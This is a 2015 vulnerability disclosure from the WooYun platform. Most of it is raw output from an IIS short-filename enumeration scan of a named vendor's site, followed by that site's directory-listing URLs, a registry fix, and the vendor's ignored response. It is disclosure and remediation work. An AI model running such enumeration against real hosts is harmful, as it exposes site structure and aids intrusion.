Found /sea83**** [scan in progress]
Found /servi**** [scan in progress]
Found /se1f2**** [scan in progress]
Found /se15e**** [scan in progress]
Found /se627**** [scan in progress]
Found /se4e5**** [scan in progress]
Found /se8bd**** [scan in progress]
Found /se754**** [scan in progress]
Found /socd8**** [scan in progress]
Found /softw**** [scan in progress]
Found /so9a2**** [scan in progress]
Found /so99e**** [scan in progress]
Found /so820**** [scan in progress]
Found /so88a**** [scan in progress]
Found /templ**** [scan in progress]
Found /baidu_**** [scan in progress]
Found /abd9e4**** [scan in progress]
Found /about-**** [scan in progress]
Found /ab6315**** [scan in progress]
Found /downlo**** [scan in progress]
Found /dya71c**** [scan in progress]
Found /dynami**** [scan in progress]
Found /dy639b**** [scan in progress]
Found /hra567**** [scan in progress]
Found /hra588**** [scan in progress]
Found /hra7fd**** [scan in progress]
Found /hrf482**** [scan in progress]
Found /hr61c4**** [scan in progress]
Found /hr8c11**** [scan in progress]
Found /hr8ea7**** [scan in progress]
Found /hr8e86**** [scan in progress]
Found /hr8300**** [scan in progress]
Found /hr_new**** [scan in progress]
Found /hr-aff**** [scan in progress]
Found /hr-faz**** [scan in progress]
Found /hr-hou**** [scan in progress]
Found /hr-hum**** [scan in progress]
Found /hr-new**** [scan in progress]
Found /hr-pei**** [scan in progress]
Found /hr-soc**** [scan in progress]
Found /hr-rec**** [scan in progress]
Found /hr-xin**** [scan in progress]
Found /hr-zhi**** [scan in progress]
Found /indust**** [scan in progress]
Found /ned4f8**** [scan in progress]
Found /neb3e5**** [scan in progress]
Found /newsad**** [scan in progress]
Found /news1-**** [scan in progress]
Found /news2-**** [scan in progress]
Found /ne24ab**** [scan in progress]
Found /ne136b**** [scan in progress]
Found /ne7039**** [scan in progress]
Found /ne9990**** [scan in progress]
Found /ne5f16**** [scan in progress]
Found /ne57c1**** [scan in progress]
Found /market**** [scan in progress]
Found /seea02**** [scan in progress]
Found /sef5c7**** [scan in progress]
Found /sea833**** [scan in progress]
Found /servic**** [scan in progress]
Found /se1f2f**** [scan in progress]
Found /se15ef**** [scan in progress]
Found /se6274**** [scan in progress]
Found /se4e55**** [scan in progress]
Found /se8bdb**** [scan in progress]
Found /se7543**** [scan in progress]
Found /socd8f**** [scan in progress]
Found /softwa**** [scan in progress]
Found /so9a2f**** [scan in progress]
Found /so99ef**** [scan in progress]
Found /so8208**** [scan in progress]
Found /so88af**** [scan in progress]
Found /templa**** [scan in progress]
Found /baidu_*h** [scan in progress]
Found /baidu_*m** [scan in progress]
Found /baidu_*t** [scan in progress]
Found /abd9e4*h** [scan in progress]
Found /abd9e4*m** [scan in progress]
Found /abd9e4*t** [scan in progress]
Found /about-*h** [scan in progress]
Found /about-*m** [scan in progress]
Found /about-*t** [scan in progress]
Found /ab6315*h** [scan in progress]
Found /ab6315*m** [scan in progress]
Found /ab6315*t** [scan in progress]
Found /downlo [scan in progress]
Found Dir /downlo~1 [Done]
Found /dya71c*h** [scan in progress]
Found /dya71c*m** [scan in progress]
Found /dya71c*t** [scan in progress]
Found /dynami*h** [scan in progress]
Found /dynami*m** [scan in progress]
Found /dynami*t** [scan in progress]
Found /dy639b*h** [scan in progress]
Found /dy639b*m** [scan in progress]
Found /dy639b*t** [scan in progress]
Found /hra567*h** [scan in progress]
Found /hra567*m** [scan in progress]
Found /hra567*t** [scan in progress]
Found /hra588*h** [scan in progress]
Found /hra588*m** [scan in progress]
Found /hra588*t** [scan in progress]
Found /hra7fd*h** [scan in progress]
Found /hra7fd*m** [scan in progress]
Found /hra7fd*t** [scan in progress]
Found /hrf482*h** [scan in progress]
Found /hrf482*m** [scan in progress]
Found /hrf482*t** [scan in progress]
Found /hr61c4*h** [scan in progress]
Found /hr61c4*m** [scan in progress]
Found /hr61c4*t** [scan in progress]
Found /hr8c11*h** [scan in progress]
Found /hr8c11*m** [scan in progress]
Found /hr8c11*t** [scan in progress]
Found /hr8ea7*h** [scan in progress]
Found /hr8ea7*m** [scan in progress]
Found /hr8ea7*t** [scan in progress]
Found /hr8e86*h** [scan in progress]
Found /hr8e86*m** [scan in progress]
Found /hr8e86*t** [scan in progress]
Found /hr8300*h** [scan in progress]
Found /hr8300*m** [scan in progress]
Found /hr8300*t** [scan in progress]
Found /hr_new*h** [scan in progress]
Found /hr_new*m** [scan in progress]
Found /hr_new*t** [scan in progress]
Found /hr-aff*h** [scan in progress]
Found /hr-aff*m** [scan in progress]
Found /hr-aff*t** [scan in progress]
Found /hr-faz*h** [scan in progress]
Found /hr-faz*m** [scan in progress]
Found /hr-faz*t** [scan in progress]
Found /hr-hou*h** [scan in progress]
Found /hr-hou*m** [scan in progress]
Found /hr-hou*t** [scan in progress]
Found /hr-hum*h** [scan in progress]
Found /hr-hum*m** [scan in progress]
Found /hr-hum*t** [scan in progress]
Found /hr-new*h** [scan in progress]
Found /hr-new*m** [scan in progress]
Found /hr-new*t** [scan in progress]
Found /hr-pei*h** [scan in progress]
Found /hr-pei*m** [scan in progress]
Found /hr-pei*t** [scan in progress]
Found /hr-soc*m** [scan in progress]
Found /hr-soc*h** [scan in progress]
Found /hr-soc*t** [scan in progress]
Found /hr-rec*h** [scan in progress]
Found /hr-rec*m** [scan in progress]
Found /hr-rec*t** [scan in progress]
Found /hr-xin*h** [scan in progress]
Found /hr-xin*m** [scan in progress]
Found /hr-xin*t** [scan in progress]
Found /hr-zhi*h** [scan in progress]
Found /hr-zhi*m** [scan in progress]
Found /hr-zhi*t** [scan in progress]
Found /indust*h** [scan in progress]
Found /indust*m** [scan in progress]
Found /indust*t** [scan in progress]
Found /ned4f8*h** [scan in progress]
Found /ned4f8*m** [scan in progress]
Found /ned4f8*t** [scan in progress]
Found /neb3e5*h** [scan in progress]
Found /neb3e5*m** [scan in progress]
Found /neb3e5*t** [scan in progress]
Found /newsad*h** [scan in progress]
Found /newsad*m** [scan in progress]
Found /newsad*t** [scan in progress]
Found /news1-*h** [scan in progress]
Found /news1-*m** [scan in progress]
Found /news1-*t** [scan in progress]
Found /news2-*h** [scan in progress]
Found /news2-*m** [scan in progress]
Found /news2-*t** [scan in progress]
Found /ne24ab*m** [scan in progress]
Found /ne24ab*h** [scan in progress]
Found /ne24ab*t** [scan in progress]
Found /ne136b*h** [scan in progress]
Found /ne136b*m** [scan in progress]
Found /ne136b*t** [scan in progress]
Found /ne7039*h** [scan in progress]
Found /ne7039*m** [scan in progress]
Found /ne7039*t** [scan in progress]
Found /ne9990*h** [scan in progress]
Found /ne9990*m** [scan in progress]
Found /ne9990*t** [scan in progress]
Found /ne5f16*h** [scan in progress]
Found /ne5f16*m** [scan in progress]
Found /ne5f16*t** [scan in progress]
Found /ne57c1*h** [scan in progress]
Found /ne57c1*m** [scan in progress]
Found /ne57c1*t** [scan in progress]
Found /market*h** [scan in progress]
Found /market*m** [scan in progress]
Found /market*t** [scan in progress]
Found /seea02*h** [scan in progress]
Found /seea02*m** [scan in progress]
Found /seea02*t** [scan in progress]
Found /sef5c7*h** [scan in progress]
Found /sef5c7*m** [scan in progress]
Found /sef5c7*t** [scan in progress]
Found /sea833*h** [scan in progress]
Found /sea833*m** [scan in progress]
Found /sea833*t** [scan in progress]
Found /servic*h** [scan in progress]
Found /servic*m** [scan in progress]
Found /servic*t** [scan in progress]
Found /se1f2f*h** [scan in progress]
Found /se1f2f*m** [scan in progress]
Found /se1f2f*t** [scan in progress]
Found /se15ef*h** [scan in progress]
Found /se15ef*m** [scan in progress]
Found /se15ef*t** [scan in progress]
Found /se6274*h** [scan in progress]
Found /se6274*m** [scan in progress]
Found /se6274*t** [scan in progress]
Found /se4e55*h** [scan in progress]
Found /se4e55*m** [scan in progress]
Found /se4e55*t** [scan in progress]
Found /se8bdb*h** [scan in progress]
Found /se8bdb*m** [scan in progress]
Found /se8bdb*t** [scan in progress]
Found /se7543*h** [scan in progress]
Found /se7543*m** [scan in progress]
Found /se7543*t** [scan in progress]
Found /socd8f*m** [scan in progress]
Found /socd8f*h** [scan in progress]
Found /socd8f*t** [scan in progress]
Found /softwa*h** [scan in progress]
Found /softwa*m** [scan in progress]
Found /softwa*t** [scan in progress]
Found /so9a2f*h** [scan in progress]
Found /so9a2f*m** [scan in progress]
Found /so9a2f*t** [scan in progress]
Found /so99ef*h** [scan in progress]
Found /so99ef*m** [scan in progress]
Found /so99ef*t** [scan in progress]
Found /so8208*m** [scan in progress]
Found /so8208*h** [scan in progress]
Found /so8208*t** [scan in progress]
Found /so88af*m** [scan in progress]
Found /so88af*h** [scan in progress]
Found /so88af*t** [scan in progress]
Found /templa [scan in progress]
Found Dir /templa~1 [Done]
Found /baidu_*ht* [scan in progress]
Found /baidu_*tm* [scan in progress]
Found /abd9e4*ht* [scan in progress]
Found /abd9e4*tm* [scan in progress]
Found /about-*ht* [scan in progress]
Found /about-*tm* [scan in progress]
Found /ab6315*ht* [scan in progress]
Found /ab6315*tm* [scan in progress]
Found /dya71c*ht* [scan in progress]
Found /dya71c*tm* [scan in progress]
Found /dynami*ht* [scan in progress]
Found /dynami*tm* [scan in progress]
Found /dy639b*ht* [scan in progress]
Found /dy639b*tm* [scan in progress]
Found /hra567*ht* [scan in progress]
Found /hra567*tm* [scan in progress]
Found /hra588*ht* [scan in progress]
Found /hra588*tm* [scan in progress]
Found /hra7fd*ht* [scan in progress]
Found /hra7fd*tm* [scan in progress]
Found /hrf482*ht* [scan in progress]
Found /hrf482*tm* [scan in progress]
Found /hr61c4*ht* [scan in progress]
Found /hr61c4*tm* [scan in progress]
Found /hr8c11*ht* [scan in progress]
Found /hr8c11*tm* [scan in progress]
Found /hr8ea7*ht* [scan in progress]
Found /hr8ea7*tm* [scan in progress]
Found /hr8e86*ht* [scan in progress]
Found /hr8e86*tm* [scan in progress]
Found /hr8300*ht* [scan in progress]
Found /hr8300*tm* [scan in progress]
Found /hr_new*ht* [scan in progress]
Found /hr_new*tm* [scan in progress]
Found /hr-aff*ht* [scan in progress]
Found /hr-aff*tm* [scan in progress]
Found /hr-faz*ht* [scan in progress]
Found /hr-faz*tm* [scan in progress]
Found /hr-hou*ht* [scan in progress]
Found /hr-hou*tm* [scan in progress]
Found /hr-hum*ht* [scan in progress]
Found /hr-hum*tm* [scan in progress]
Found /hr-new*ht* [scan in progress]
Found /hr-new*tm* [scan in progress]
Found /hr-pei*ht* [scan in progress]
Found /hr-pei*tm* [scan in progress]
Found /hr-soc*ht* [scan in progress]
Found /hr-soc*tm* [scan in progress]
Found /hr-rec*ht* [scan in progress]
Found /hr-rec*tm* [scan in progress]
Found /hr-xin*ht* [scan in progress]
Found /hr-xin*tm* [scan in progress]
Found /hr-zhi*ht* [scan in progress]
Found /hr-zhi*tm* [scan in progress]
Found /indust*ht* [scan in progress]
Found /indust*tm* [scan in progress]
Found /ned4f8*ht* [scan in progress]
Found /ned4f8*tm* [scan in progress]
Found /neb3e5*ht* [scan in progress]
Found /neb3e5*tm* [scan in progress]
Found /newsad*ht* [scan in progress]
Found /newsad*tm* [scan in progress]
Found /news1-*ht* [scan in progress]
Found /news1-*tm* [scan in progress]
Found /news2-*ht* [scan in progress]
Found /news2-*tm* [scan in progress]
Found /ne24ab*ht* [scan in progress]
Found /ne24ab*tm* [scan in progress]
Found /ne136b*ht* [scan in progress]
Found /ne136b*tm* [scan in progress]
Found /ne7039*ht* [scan in progress]
Found /ne7039*tm* [scan in progress]
Found /ne9990*ht* [scan in progress]
Found /ne9990*tm* [scan in progress]
Found /ne5f16*ht* [scan in progress]
Found /ne5f16*tm* [scan in progress]
Found /ne57c1*ht* [scan in progress]
Found /ne57c1*tm* [scan in progress]
Found /market*ht* [scan in progress]
Found /market*tm* [scan in progress]
Found /seea02*ht* [scan in progress]
Found /seea02*tm* [scan in progress]
Found /sef5c7*ht* [scan in progress]
Found /sef5c7*tm* [scan in progress]
Found /sea833*ht* [scan in progress]
Found /sea833*tm* [scan in progress]
Found /servic*ht* [scan in progress]
Found /servic*tm* [scan in progress]
Found /se1f2f*ht* [scan in progress]
Found /se1f2f*tm* [scan in progress]
Found /se15ef*ht* [scan in progress]
Found /se15ef*tm* [scan in progress]
Found /se6274*ht* [scan in progress]
Found /se6274*tm* [scan in progress]
Found /se4e55*ht* [scan in progress]
Found /se4e55*tm* [scan in progress]
Found /se8bdb*ht* [scan in progress]
Found /se8bdb*tm* [scan in progress]
Found /se7543*ht* [scan in progress]
Found /se7543*tm* [scan in progress]
Found /socd8f*ht* [scan in progress]
Found /socd8f*tm* [scan in progress]
Found /softwa*ht* [scan in progress]
Found /softwa*tm* [scan in progress]
Found /so9a2f*ht* [scan in progress]
Found /so9a2f*tm* [scan in progress]
Found /so99ef*ht* [scan in progress]
Found /so99ef*tm* [scan in progress]
Found /so8208*ht* [scan in progress]
Found /so8208*tm* [scan in progress]
Found /so88af*ht* [scan in progress]
Found /so88af*tm* [scan in progress]
Found /baidu_*htm [scan in progress]
Found File /baidu_~1.htm [Done]
Found /abd9e4*htm [scan in progress]
Found File /abd9e4~1.htm [Done]
Found /about-*htm [scan in progress]
Found File /about-~1.htm [Done]
Found /ab6315*htm [scan in progress]
Found File /ab6315~1.htm [Done]
Found /dya71c*htm [scan in progress]
Found File /dya71c~1.htm [Done]
Found /dynami*htm [scan in progress]
Found File /dynami~1.htm [Done]
Found /dy639b*htm [scan in progress]
Found File /dy639b~1.htm [Done]
Found /hra567*htm [scan in progress]
Found File /hra567~1.htm [Done]
Found /hra588*htm [scan in progress]
Found File /hra588~1.htm [Done]
Found /hra7fd*htm [scan in progress]
Found File /hra7fd~1.htm [Done]
Found /hrf482*htm [scan in progress]
Found File /hrf482~1.htm [Done]
Found /hr61c4*htm [scan in progress]
Found File /hr61c4~1.htm [Done]
Found /hr8c11*htm [scan in progress]
Found File /hr8c11~1.htm [Done]
Found /hr8ea7*htm [scan in progress]
Found File /hr8ea7~1.htm [Done]
Found /hr8e86*htm [scan in progress]
Found File /hr8e86~1.htm [Done]
Found /hr8300*htm [scan in progress]
Found File /hr8300~1.htm [Done]
Found /hr_new*htm [scan in progress]
Found File /hr_new~1.htm [Done]
Found /hr-aff*htm [scan in progress]
Found File /hr-aff~1.htm [Done]
Found /hr-faz*htm [scan in progress]
Found File /hr-faz~1.htm [Done]
Found /hr-hou*htm [scan in progress]
Found File /hr-hou~1.htm [Done]
Found /hr-hum*htm [scan in progress]
Found File /hr-hum~1.htm [Done]
Found /hr-new*htm [scan in progress]
Found File /hr-new~1.htm [Done]
Found /hr-pei*htm [scan in progress]
Found File /hr-pei~1.htm [Done]
Found /hr-soc*htm [scan in progress]
Found File /hr-soc~1.htm [Done]
Found /hr-rec*htm [scan in progress]
Found File /hr-rec~1.htm [Done]
Found /hr-xin*htm [scan in progress]
Found File /hr-xin~1.htm [Done]
Found /hr-zhi*htm [scan in progress]
Found File /hr-zhi~1.htm [Done]
Found /indust*htm [scan in progress]
Found File /indust~1.htm [Done]
Found /ned4f8*htm [scan in progress]
Found File /ned4f8~1.htm [Done]
Found /neb3e5*htm [scan in progress]
Found File /neb3e5~1.htm [Done]
Found /newsad*htm [scan in progress]
Found File /newsad~1.htm [Done]
Found /news1-*htm [scan in progress]
Found File /news1-~1.htm [Done]
Found /news2-*htm [scan in progress]
Found File /news2-~1.htm [Done]
Found /ne24ab*htm [scan in progress]
Found File /ne24ab~1.htm [Done]
Found /ne136b*htm [scan in progress]
Found File /ne136b~1.htm [Done]
Found /ne7039*htm [scan in progress]
Found File /ne7039~1.htm [Done]
Found /ne9990*htm [scan in progress]
Found File /ne9990~1.htm [Done]
Found /ne5f16*htm [scan in progress]
Found File /ne5f16~1.htm [Done]
Found /ne57c1*htm [scan in progress]
Found File /ne57c1~1.htm [Done]
Found /market*htm [scan in progress]
Found File /market~1.htm [Done]
Found /seea02*htm [scan in progress]
Found File /seea02~1.htm [Done]
Found /sef5c7*htm [scan in progress]
Found File /sef5c7~1.htm [Done]
Found /sea833*htm [scan in progress]
Found File /sea833~1.htm [Done]
Found /servic*htm [scan in progress]
Found File /servic~1.htm [Done]
Found /se1f2f*htm [scan in progress]
Found File /se1f2f~1.htm [Done]
Found /se15ef*htm [scan in progress]
Found File /se15ef~1.htm [Done]
Found /se6274*htm [scan in progress]
Found File /se6274~1.htm [Done]
Found /se4e55*htm [scan in progress]
Found File /se4e55~1.htm [Done]
Found /se8bdb*htm [scan in progress]
Found File /se8bdb~1.htm [Done]
Found /se7543*htm [scan in progress]
Found File /se7543~1.htm [Done]
Found /socd8f*htm [scan in progress]
Found File /socd8f~1.htm [Done]
Found /softwa*htm [scan in progress]
Found File /softwa~1.htm [Done]
Found /so9a2f*htm [scan in progress]
Found File /so9a2f~1.htm [Done]
Found /so99ef*htm [scan in progress]
Found File /so99ef~1.htm [Done]
Found /so8208*htm [scan in progress]
Found File /so8208~1.htm [Done]
Found /so88af*htm [scan in progress]
Found File /so88af~1.htm [Done]
----------------------------------------------------------------
Dir: /downlo~1
Dir: /templa~1
File: /baidu_~1.htm
File: /abd9e4~1.htm
File: /about-~1.htm
File: /ab6315~1.htm
File: /dya71c~1.htm
File: /dynami~1.htm
File: /dy639b~1.htm
File: /hra567~1.htm
File: /hra588~1.htm
File: /hra7fd~1.htm
File: /hrf482~1.htm
File: /hr61c4~1.htm
File: /hr8c11~1.htm
File: /hr8ea7~1.htm
File: /hr8e86~1.htm
File: /hr8300~1.htm
File: /hr_new~1.htm
File: /hr-aff~1.htm
File: /hr-faz~1.htm
File: /hr-hou~1.htm
File: /hr-hum~1.htm
File: /hr-new~1.htm
File: /hr-pei~1.htm
File: /hr-soc~1.htm
File: /hr-rec~1.htm
File: /hr-xin~1.htm
File: /hr-zhi~1.htm
File: /indust~1.htm
File: /ned4f8~1.htm
File: /neb3e5~1.htm
File: /newsad~1.htm
File: /news1-~1.htm
File: /news2-~1.htm
File: /ne24ab~1.htm
File: /ne136b~1.htm
File: /ne7039~1.htm
File: /ne9990~1.htm
File: /ne5f16~1.htm
File: /ne57c1~1.htm
File: /market~1.htm
File: /seea02~1.htm
File: /sef5c7~1.htm
File: /sea833~1.htm
File: /servic~1.htm
File: /se1f2f~1.htm
File: /se15ef~1.htm
File: /se6274~1.htm
File: /se4e55~1.htm
File: /se8bdb~1.htm
File: /se7543~1.htm
File: /socd8f~1.htm
File: /softwa~1.htm
File: /so9a2f~1.htm
File: /so99ef~1.htm
File: /so8208~1.htm
File: /so88af~1.htm
----------------------------------------------------------------
2 Directories, 56 Files found in toal
赠送一个目录浏览漏洞
http://cloudos.bingocloud.cn/system/
http://cloudos.bingocloud.cn/var

修复方案:

1) 升级.net framework
2) 修改注册表键值:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem
修改NtfsDisable8dot3NameCreation为1。

版权声明:转载请注明来源 0c0c0f@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-15 15:20

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-18 10:18 | 0c0c0f ( 实习白帽子 | Rank:48 漏洞数:15 | My H34rt c4n 3xploit 4ny h0les!)

    要我联系信息了,然后忽略了。。。